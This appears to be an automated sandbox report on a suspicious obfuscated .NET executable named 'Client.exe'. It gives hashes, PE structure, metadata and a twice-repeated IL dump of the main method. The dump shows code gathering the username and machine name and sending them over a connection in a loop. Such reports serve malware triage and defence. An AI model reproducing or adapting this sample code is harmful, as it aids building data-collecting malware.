Suspicious
Suspect

c8a1e71708c9b62363ab536ac6e86d07

PE Executable
|
MD5: c8a1e71708c9b62363ab536ac6e86d07
|
Size: 470.02 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
c8a1e71708c9b62363ab536ac6e86d07
Sha1
c0db212aba0780b330fda2b8090b6551e08cb88b
Sha256
b20d5974675630ec67c45ea56eac427718a06821d655134a8f4b892d07276972
Sha384
68e5b47a247e5d9f3ccc73c5e6d7143dcc352ada57d89eddb10857c4efef741bc52fc04c17d132c4551d349c41d19f3d
Sha512
271a5eae57547bb0fef0d1660a34ee2a570791a909212e70be340d6dd7af138aca1f132dec7901f57dff4a9fd56fe1a7d02194ee4b24b95d7231f3600c6f42b2
SSDeep
6144:y7iPGGUpS6qh5XqZ/dluGOu32PB2OhhwymM67cJ4cDkPRRN49XyxDiE3PF8XB1CR:yIGFS6qh5XkbOwvOhhDkcvBZXBYmMvh
TLSH
A4A439253FA48E10D854287ECABE2A09CB16E0F125026347770AF7A55D05DEEDE2D3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
9aag4h
upwcnuutr2cqdf
Information
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

487

Main Method

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uaXHrETOyLECbhiBMmDNIYn() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LfzATRHshflABnGHEv() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::iGbgdDdkxWxi() stloc V_3 nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mvvMETuhEMUvwhzZ() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() br IL_000E: nop call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() call System.Void ozKsaPZuKocHnsrt.NSAYZbVsiDuPK::FvQxpaHjat() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::PBKSCzXJRTztlX call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::bYQARtWqxKMf() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Void ZamUWMooRSEpPDUjIQdeP.hNmDtGZIepsNoOxKooWoFOx::nxSJZtVeFGkSPIzATD() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Boolean qokcmkPYpUvFBXVood.fqSqCCfEtWzsxdyt::KtFlRVdxknLuTv(System.String) brtrue IL_0080: call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() leave IL_0283: ret call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() call System.Void HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::IdMTpEgnJMzPSl() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brtrue IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::RJcJoqsutwfiHFVcGLxkuaKWu call 
System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vIMREVkyWxpgKWkxPNG() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uDkAaeuGkhVdKRaoVEhZLNi() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::EAupkygTtilsXMqa() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::dNobMWswwbKfgghUOv() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jEWmBBkcghQJOHyhz() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::useCtoXVnMCEYJQQrWHbnabt() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::OfRwYiyhaUCvh() ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hPfNYabJHtxPb() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XGURkpeIFYOeDWxoNV() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LZMIMDTkFYYzJ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::wntfOmIJZJOfhHaISDvBP() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YJTAlLrgZJGy() ldelem System.String ldloc V_2 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem 
System.String callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::NdgqVjuJyxIGybeojVJRq(System.String,System.String) ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brfalse IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::QfvPSvVcWnWqwdqdkryDrh ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::tjeIncIrkcHKRZKAgfj ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::WFLSfcFPALyHOQEZkhZFXfMe() newarr System.Object dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cJSfADBNJwetFsXDqXyUsX() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::RmLBwjAlRwrrAk() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mGobhtWrtheDSnkAIxtETZgf() call System.Byte[] HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::CdlqSCLtEhdndh() stelem.ref <null> dup <null> call System.Int32 
uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BBgHOJvEOfYMbUUnFlMbpE() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::cdtiddjjwD stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::GXpXzTbMaJmfrpk() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::AkRuYYRUgzeDaqqd stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XiyEHMogcYQOoTDzwka() call System.String System.Environment::get_UserName() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::KgbQvIBudqtdsYMRy() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YlwlnSxCppdyUHotrAItj() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::xFXGKuhJBSVKn stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vaCMYGFmiGOA() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::sXTbtyIQFFgjWBaPUSrGNJAcM stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::llMQpOlrnvS() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::qQxZnqZtuPurvYDgAS stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hfKIwbgAPqWjbtrwCGWjUACH() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ckXsILrCdbQMN stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jTfxRHekSrbveleiAqv() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::bYfjmxDThkjXrOTIrT stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cpwXoogZiZgcDd() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::HRMMCdOxLgxD stelem.ref <null> dup <null> call System.Int32 
uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::IBCyjrzIBPBYU() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::wJIChSRUwTRzvDp stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BUJHsCuXIIcaFBtLzsAZWhx() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ogQTHmJtHEXNFkB stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::MXdguHnQLhhEWUKbRlttVIm() call System.String HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::nQElVWRAqOHCdXWWlnmbJfP() stelem.ref <null> call System.Byte[] cVTTDhBIWIqfbAg.STnCnDsWBYILmycXJUnBTTAst::XmiTcMvWCMeAPQJezSuJgJwu(System.Object[]) callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::JIUdovrXkYLPX(System.Byte[]) call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY pop <null> leave IL_0283: ret ret <null>

Module Name

Client.exe

Full Name

Client.exe

EntryPoint

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])

Scope Name

Client.exe

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

Client

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

487

Main Method

System.Void wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::CqWpWvJRnuVy(System.String[])

Main IL Instruction Count

167

Main IL

call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uaXHrETOyLECbhiBMmDNIYn() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LfzATRHshflABnGHEv() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::iGbgdDdkxWxi() stloc V_3 nop <null> ldloc V_3 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mvvMETuhEMUvwhzZ() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() br IL_000E: nop call System.Void uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::MmAsTNJSKnEXwVQ() call System.Void ozKsaPZuKocHnsrt.NSAYZbVsiDuPK::FvQxpaHjat() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::PBKSCzXJRTztlX call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::bYQARtWqxKMf() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Void ZamUWMooRSEpPDUjIQdeP.hNmDtGZIepsNoOxKooWoFOx::nxSJZtVeFGkSPIzATD() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::EGfMEqzGOn call System.Boolean qokcmkPYpUvFBXVood.fqSqCCfEtWzsxdyt::KtFlRVdxknLuTv(System.String) brtrue IL_0080: call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() leave IL_0283: ret call System.Void gOajUJpgloyXYWWupOKAm.sqFeLsfUKddstZFDAyvC::uuDWZLAzBiv() call System.Void HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::IdMTpEgnJMzPSl() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brtrue IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::RJcJoqsutwfiHFVcGLxkuaKWu call 
System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vIMREVkyWxpgKWkxPNG() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::uDkAaeuGkhVdKRaoVEhZLNi() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::EAupkygTtilsXMqa() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::dNobMWswwbKfgghUOv() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jEWmBBkcghQJOHyhz() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::useCtoXVnMCEYJQQrWHbnabt() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::OfRwYiyhaUCvh() ldelem System.String call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hPfNYabJHtxPb() newarr System.Char dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XGURkpeIFYOeDWxoNV() call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::LZMIMDTkFYYzJ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::wntfOmIJZJOfhHaISDvBP() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldloc V_1 call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YJTAlLrgZJGy() ldelem System.String ldloc V_2 ldsfld System.Random HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::JDLAIWnUDiyAA ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem 
System.String callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::NdgqVjuJyxIGybeojVJRq(System.String,System.String) ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldfld System.Boolean ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::cAMPOtvfjOJCsVx brfalse IL_026E: call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld CbWqbOdapmaXfwQjc.lCLOXLnaDoRkZ ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::QfvPSvVcWnWqwdqdkryDrh ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY newobj System.Void ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT::.ctor(ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV) stfld ZamUWMooRSEpPDUjIQdeP.ZWBpVPCdWQOBLYkFThGEXT ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::tjeIncIrkcHKRZKAgfj ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::WFLSfcFPALyHOQEZkhZFXfMe() newarr System.Object dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cJSfADBNJwetFsXDqXyUsX() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::RmLBwjAlRwrrAk() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::mGobhtWrtheDSnkAIxtETZgf() call System.Byte[] HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::CdlqSCLtEhdndh() stelem.ref <null> dup <null> call System.Int32 
uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BBgHOJvEOfYMbUUnFlMbpE() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::cdtiddjjwD stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::GXpXzTbMaJmfrpk() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::AkRuYYRUgzeDaqqd stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::XiyEHMogcYQOoTDzwka() call System.String System.Environment::get_UserName() call System.String uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::KgbQvIBudqtdsYMRy() call System.String cVTTDhBIWIqfbAg.kxBVNNGFBcOh::uJXOPTVSDTnarudBntwp(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::YlwlnSxCppdyUHotrAItj() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::xFXGKuhJBSVKn stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::vaCMYGFmiGOA() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::sXTbtyIQFFgjWBaPUSrGNJAcM stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::llMQpOlrnvS() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::qQxZnqZtuPurvYDgAS stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::hfKIwbgAPqWjbtrwCGWjUACH() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ckXsILrCdbQMN stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::jTfxRHekSrbveleiAqv() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::bYfjmxDThkjXrOTIrT stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::cpwXoogZiZgcDd() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::HRMMCdOxLgxD stelem.ref <null> dup <null> call System.Int32 
uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::IBCyjrzIBPBYU() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::wJIChSRUwTRzvDp stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::BUJHsCuXIIcaFBtLzsAZWhx() ldsfld System.String uUXgpLnmouWDIYNaA.XFdOiicovnCeRN::ogQTHmJtHEXNFkB stelem.ref <null> dup <null> call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::MXdguHnQLhhEWUKbRlttVIm() call System.String HPYoxDmdlmXwoid.ovguVvBTBSgPiecTOlTU::nQElVWRAqOHCdXWWlnmbJfP() stelem.ref <null> call System.Byte[] cVTTDhBIWIqfbAg.STnCnDsWBYILmycXJUnBTTAst::XmiTcMvWCMeAPQJezSuJgJwu(System.Object[]) callvirt System.Void ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV::JIUdovrXkYLPX(System.Byte[]) call System.Int32 uUXgpLnmouWDIYNaA.MYZZKURFxHGmdfUqkMYPwgxFk::PqQIYvVUWRvUYOcAVMOXTopeh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld ZamUWMooRSEpPDUjIQdeP.IwHHhQNGMvKecV wokmJZJJJAOvdvEPLRFzl.mOWNzTiKEumTaYUysnpz::asetLCFGdhKcpkY pop <null> leave IL_0283: ret ret <null>

c8a1e71708c9b62363ab536ac6e86d07 (470.02 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
9aag4h
upwcnuutr2cqdf
Characteristics
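No malware configuration was found at this point. Given the very high symbol obfuscation score reported above, the absence of an extracted configuration does not by itself rule out an embedded one.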